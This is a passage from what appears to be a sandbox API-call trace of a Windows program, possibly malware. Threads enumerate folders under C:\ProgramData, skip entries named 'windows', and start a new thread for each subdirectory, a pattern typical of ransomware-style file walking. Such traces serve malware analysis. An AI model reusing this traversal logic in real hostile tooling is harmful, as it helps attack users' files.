Viewer\\Views\\*.*", lpFindFileData=0x202dfd30 | out: lpFindFileData=0x202dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5830 [0045.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.455] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0x202dfd30 | out: lpFindFileData=0x202dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.455] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.455] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0x202dfd30 | out: lpFindFileData=0x202dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 1 [0045.455] lstrcmpW (lpString1=".", lpString2="ApplicationViewsRootNode") returned -1 [0045.455] lstrcmpW (lpString1="..", lpString2="ApplicationViewsRootNode") returned -1 [0045.455] lstrcmpiW (lpString1="windows", lpString2="ApplicationViewsRootNode") returned 1 [0048.590] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*" [0048.590] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*") returned 51 [0048.590] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\", lpString2="ApplicationViewsRootNode" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0048.590] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*" [0048.590] GlobalMemoryStatus (in: lpBuffer=0x202dfd10 | out: lpBuffer=0x202dfd10) [0048.590] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e40ad8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.599] CloseHandle (hObject=0x308) returned 1 [0048.599] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0x202dfd30 | out: lpFindFileData=0x202dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 0 [0048.599] FindClose (in: hFindFile=0x5a5830 | out: hFindFile=0x5a5830) returned 1 Thread: id = 484 os_tid = 0x9d4 [0045.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*", lpFindFileData=0x2041fd30 | out: lpFindFileData=0x2041fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34b0 [0045.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.535] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x2041fd30 | out: lpFindFileData=0x2041fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.788] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.789] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x2041fd30 | out: lpFindFileData=0x2041fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0048.789] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_x86") returned -1 [0048.789] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_x86") returned -1 [0048.789] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_x86") returned 1 [0048.791] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*" [0048.791] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*") returned 95 [0048.791] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0048.791] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*" [0048.791] GlobalMemoryStatus (in: lpBuffer=0x2041fd10 | out: lpBuffer=0x2041fd10) [0048.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24a8e160, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a0 [0048.802] CloseHandle (hObject=0x5a0) returned 1 [0048.802] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x2041fd30 | out: lpFindFileData=0x2041fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0048.802] FindClose (in: hFindFile=0x5e34b0 | out: hFindFile=0x5e34b0) returned 1 Thread: id = 485 os_tid = 0x9b8 [0045.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*", lpFindFileData=0x2055fd30 | out: lpFindFileData=0x2055fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28f0 [0045.330] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.330] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x2055fd30 | out: lpFindFileData=0x2055fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.330] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.330] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x2055fd30 | out: lpFindFileData=0x2055fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0045.330] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_amd64") returned -1 [0045.330] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_amd64") returned -1 [0045.330] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_amd64") returned 1 [0047.488] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*" [0047.489] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*") returned 95 [0047.489] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0047.489] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0047.489] GlobalMemoryStatus (in: lpBuffer=0x2055fd10 | out: lpBuffer=0x2055fd10) [0048.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116698d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ec [0048.409] CloseHandle (hObject=0x6ec) returned 1 [0048.409] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x2055fd30 | out: lpFindFileData=0x2055fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0048.409] FindClose (in: hFindFile=0x5e28f0 | out: hFindFile=0x5e28f0) returned 1 Thread: id = 486 os_tid = 0x5cc [0045.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*", lpFindFileData=0x2069fd30 | out: lpFindFileData=0x2069fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28b0 [0045.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.331] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x2069fd30 | out: lpFindFileData=0x2069fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.331] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.331] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.331] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x2069fd30 | out: lpFindFileData=0x2069fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0045.331] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_amd64") returned -1 [0045.331] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_amd64") returned -1 [0045.331] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_amd64") returned 1 [0048.988] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*" [0048.988] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*") returned 95 [0048.989] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0048.989] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0048.989] GlobalMemoryStatus (in: lpBuffer=0x2069fd10 | out: lpBuffer=0x2069fd10) [0048.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d26848, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6b8 [0049.003] CloseHandle (hObject=0x6b8) returned 1 [0049.003] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x2069fd30 | out: lpFindFileData=0x2069fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0049.004] FindClose (in: hFindFile=0x5e28b0 | out: hFindFile=0x5e28b0) returned 1 Thread: id = 487 os_tid = 0x62c [0045.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*", lpFindFileData=0x207dfd30 | out: lpFindFileData=0x207dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db7f8 [0048.283] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.283] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x207dfd30 | out: lpFindFileData=0x207dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.283] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.283] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.283] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x207dfd30 | out: lpFindFileData=0x207dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0048.283] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_x86") returned -1 [0048.283] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_x86") returned -1 [0048.283] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_x86") returned 1 [0048.283] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*" [0048.283] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*") returned 96 [0048.283] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0048.283] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0048.283] GlobalMemoryStatus (in: lpBuffer=0x207dfd10 | out: lpBuffer=0x207dfd10) [0048.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107c0118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x63c [0048.416] CloseHandle (hObject=0x63c) returned 1 [0048.416] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x207dfd30 | out: lpFindFileData=0x207dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0048.416] FindClose (in: hFindFile=0x5db7f8 | out: hFindFile=0x5db7f8) returned 1 Thread: id = 488 os_tid = 0x9b4 [0045.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2770 [0045.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.332] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.332] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.332] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x2091fd30 | out: lpFindFileData=0x2091fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0045.332] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_x86") returned -1 [0045.332] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_x86") returned -1 [0045.332] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_x86") returned 1 [0049.196] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package 